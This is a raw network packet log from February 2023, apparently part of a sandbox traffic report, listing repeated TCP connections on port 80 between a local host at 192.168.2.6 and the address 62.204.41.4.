                          Feb 7, 2023 20:01:26.873693943 CET4985580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:26.933696985 CET804985462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:26.933870077 CET4985480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:26.936014891 CET804985562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:26.936269045 CET4985580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:26.978024006 CET4985580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:27.040384054 CET804985562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:27.043203115 CET804985562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:27.043423891 CET4985580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:27.267931938 CET4985580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:27.268908978 CET4985680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:27.329408884 CET804985662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:27.329654932 CET4985680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:27.330357075 CET804985562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:27.330480099 CET4985580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:28.475142002 CET4985680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:28.538610935 CET804985662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:28.542397022 CET804985662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:28.542606115 CET4985680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:28.774847984 CET4985680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:28.775707006 CET4985780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:28.835865974 CET804985662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:28.836107969 CET4985680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:28.837337017 CET804985762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:28.837582111 CET4985780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:28.881944895 CET4985780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:28.944277048 CET804985762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:28.947046995 CET804985762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:28.947166920 CET4985780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.060564041 CET4985780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.061522007 CET4985880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.122833967 CET804985762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:29.122942924 CET4985780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.124100924 CET804985862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:29.124310970 CET4985880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.126523972 CET4985880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.190675020 CET804985862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:29.194288015 CET804985862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:29.194377899 CET4985880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.311167002 CET4985880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.312261105 CET4985980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.375128031 CET804985862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:29.375159979 CET804985962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:29.375250101 CET4985880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.375312090 CET4985980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.375750065 CET4985980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.437225103 CET804985962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:29.442006111 CET804985962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:29.442117929 CET4985980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.559793949 CET4985980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.560481071 CET4986080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.622036934 CET804985962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:29.622174978 CET4985980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.622447968 CET804986062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:29.622540951 CET4986080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.628066063 CET4986080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.689563036 CET804986062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:29.692550898 CET804986062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:29.692653894 CET4986080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.816756964 CET4986080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.819359064 CET4986180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.879190922 CET804986062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:29.879375935 CET4986080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.881000996 CET804986162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:29.881227016 CET4986180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.882531881 CET4986180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:29.944051027 CET804986162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:29.945761919 CET804986162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:29.945938110 CET4986180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.060503006 CET4986180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.061285973 CET4986280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.123641968 CET804986162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:30.123781919 CET4986180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.124860048 CET804986262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:30.125050068 CET4986280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.125467062 CET4986280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.187098980 CET804986262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:30.190821886 CET804986262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:30.194760084 CET4986280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.310647964 CET4986280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.311567068 CET4986380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.372525930 CET804986262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:30.372767925 CET4986280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.372955084 CET804986362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:30.373210907 CET4986380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.373661995 CET4986380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.435141087 CET804986362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:30.437711000 CET804986362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:30.437897921 CET4986380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.544140100 CET4986380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.545022964 CET4986480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.605539083 CET804986462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:30.605703115 CET804986362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:30.605916977 CET4986380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.606750965 CET4986480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.634610891 CET4986480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.695158005 CET804986462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:30.697523117 CET804986462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:30.697700024 CET4986480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.810357094 CET4986480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.811131954 CET4986580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.871299982 CET804986462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:30.871776104 CET804986562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:30.871854067 CET4986480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.871951103 CET4986580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.873059034 CET4986580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:30.933865070 CET804986562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:30.936146021 CET804986562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:30.936579943 CET4986580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.048255920 CET4986580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.049043894 CET4986680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.108695984 CET804986662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:31.108850956 CET804986562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:31.109045982 CET4986680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.109062910 CET4986580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.109834909 CET4986680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.169347048 CET804986662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:31.173635960 CET804986662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:31.173904896 CET4986680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.279246092 CET4986680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.279970884 CET4986780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.338947058 CET804986662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:31.339188099 CET4986680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.341573000 CET804986762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:31.341813087 CET4986780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.342485905 CET4986780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.404161930 CET804986762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:31.406632900 CET804986762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:31.406838894 CET4986780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.536312103 CET4986780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.537369013 CET4986880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.597923040 CET804986862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:31.597960949 CET804986762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:31.598257065 CET4986780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.598757029 CET4986880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.598757029 CET4986880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.659370899 CET804986862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:31.661962032 CET804986862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:31.662260056 CET4986880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.779592991 CET4986880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.780776978 CET4986980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.840300083 CET804986862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:31.840415955 CET4986880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.842215061 CET804986962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:31.842446089 CET4986980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.842864037 CET4986980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:31.904400110 CET804986962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:31.907516003 CET804986962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:31.907723904 CET4986980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.015360117 CET4986980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.016506910 CET4987080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.077353001 CET804986962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:32.077429056 CET804987062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:32.077567101 CET4986980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.077702999 CET4987080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.078335047 CET4987080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.139137030 CET804987062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:32.142682076 CET804987062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:32.142890930 CET4987080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.276966095 CET4987080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.278486013 CET4987180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.337630987 CET804987062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:32.337790012 CET4987080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.341481924 CET804987162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:32.341638088 CET4987180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.342194080 CET4987180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.403517962 CET804987162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:32.405644894 CET804987162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:32.405832052 CET4987180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.535531998 CET4987180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.536211967 CET4987280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.597006083 CET804987162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:32.597121000 CET4987180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.598479986 CET804987262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:32.598732948 CET4987280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.599241018 CET4987280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.661453009 CET804987262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:32.663626909 CET804987262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:32.663721085 CET4987280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.784466028 CET4987280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.785907030 CET4987380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.846818924 CET804987262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:32.846893072 CET4987280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.847301006 CET804987362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:32.847387075 CET4987380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.847820044 CET4987380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:32.909351110 CET804987362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:32.911439896 CET804987362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:32.911674023 CET4987380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.043566942 CET4987380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.044599056 CET4987480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.105276108 CET804987462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:33.105328083 CET804987362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:33.105597019 CET4987380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.106040955 CET4987480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.109252930 CET4987480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.170200109 CET804987462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:33.173959970 CET804987462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:33.174177885 CET4987480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.278400898 CET4987480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.279244900 CET4987580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.338949919 CET804987462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:33.339133024 CET4987480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.340790033 CET804987562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:33.340971947 CET4987580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.341459990 CET4987580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.402749062 CET804987562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:33.405076027 CET804987562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:33.405255079 CET4987580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.517421961 CET4987580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.518374920 CET4987680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.578967094 CET804987562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:33.579740047 CET804987662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:33.579878092 CET4987580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.579955101 CET4987680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.586090088 CET4987680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.647861958 CET804987662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:33.649971008 CET804987662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:33.650259018 CET4987680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.765575886 CET4987680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.772423983 CET4987780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.827034950 CET804987662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:33.827260971 CET4987680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.832048893 CET804987762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:33.832353115 CET4987780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.832947016 CET4987780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:33.892494917 CET804987762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:33.894639015 CET804987762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:33.897166014 CET4987780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.014250040 CET4987780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.016196012 CET4987880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.073832989 CET804987762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:34.074069977 CET4987780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.079479933 CET804987862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:34.079766989 CET4987880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.080303907 CET4987880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.142870903 CET804987862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:34.146358967 CET804987862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:34.146537066 CET4987880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.272444010 CET4987880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.273413897 CET4987980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.335002899 CET804987962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:34.335202932 CET804987862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:34.335270882 CET4987980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.335345984 CET4987880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.335803986 CET4987980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.397248983 CET804987962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:34.399455070 CET804987962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:34.399713993 CET4987980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.535152912 CET4987980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.535939932 CET4988180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.597707987 CET804987962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:34.597914934 CET4987980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.598517895 CET804988162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:34.598675966 CET4988180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.599060059 CET4988180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.661405087 CET804988162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:34.663373947 CET804988162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:34.663542986 CET4988180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.809849977 CET4988180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.811661005 CET4988280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.872019053 CET804988262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:34.872143984 CET4988280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.872481108 CET804988162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:34.872561932 CET4988180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.875626087 CET4988280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:34.935913086 CET804988262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:34.938281059 CET804988262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:34.938399076 CET4988280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.045419931 CET4988280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.046731949 CET4988380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.106745958 CET804988262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:35.106960058 CET4988280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.109222889 CET804988362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:35.109386921 CET4988380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.109836102 CET4988380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.172056913 CET804988362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:35.175904036 CET804988362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:35.176204920 CET4988380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.279098988 CET4988380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.280320883 CET4988480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.341485977 CET804988362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:35.341658115 CET4988380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.342669964 CET804988462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:35.342828989 CET4988480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.347764015 CET4988480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.411479950 CET804988462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:35.413851976 CET804988462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:35.414088011 CET4988480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.531476974 CET4988480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.532805920 CET4988580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.592546940 CET804988562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:35.592839956 CET4988580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.593496084 CET4988580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.593657017 CET804988462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:35.593784094 CET4988480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.652903080 CET804988562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:35.655714989 CET804988562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:35.655936956 CET4988580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.771351099 CET4988580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.772528887 CET4988680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.831223965 CET804988562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:35.831336975 CET4988580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.831954956 CET804988662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:35.832092047 CET4988680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.832637072 CET4988680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:35.892030001 CET804988662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:35.894501925 CET804988662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:35.894644976 CET4988680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.025329113 CET4988680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.028526068 CET4988780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.085056067 CET804988662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:36.085165024 CET4988680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.090131044 CET804988762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:36.090272903 CET4988780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.097176075 CET4988780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.159029007 CET804988762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:36.162766933 CET804988762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:36.162858963 CET4988780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.290956020 CET4988780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.291929960 CET4988880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.352550983 CET804988762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:36.352634907 CET4988780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.353212118 CET804988862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:36.353315115 CET4988880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.353709936 CET4988880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.416671991 CET804988862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:36.418462038 CET804988862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:36.418569088 CET4988880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.537137985 CET4988880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.538187981 CET4988980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.600183964 CET804988862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:36.600307941 CET4988880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.601329088 CET804988962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:36.601526022 CET4988980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.602318048 CET4988980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.665793896 CET804988962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:36.667840004 CET804988962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:36.667974949 CET4988980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.782042980 CET4988980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.782783031 CET4989080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.844347954 CET804988962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:36.844450951 CET4988980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.845403910 CET804989062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:36.845515013 CET4989080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.846820116 CET4989080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:36.909503937 CET804989062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:36.911346912 CET804989062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:36.911472082 CET4989080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:37.033293009 CET4989080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:37.033998966 CET4989180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:37.096540928 CET804989162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:37.096677065 CET4989180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:37.096678972 CET804989062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:37.096875906 CET4989080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:37.097124100 CET4989180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:37.158993959 CET804989162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:37.162909031 CET804989162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:37.165694952 CET4989180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:37.280268908 CET4989180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:37.281327009 CET4989280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:37.343421936 CET804989162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:37.343466043 CET804989262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:37.343622923 CET4989180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:37.343683958 CET4989280192.168.2.662.204.41.4
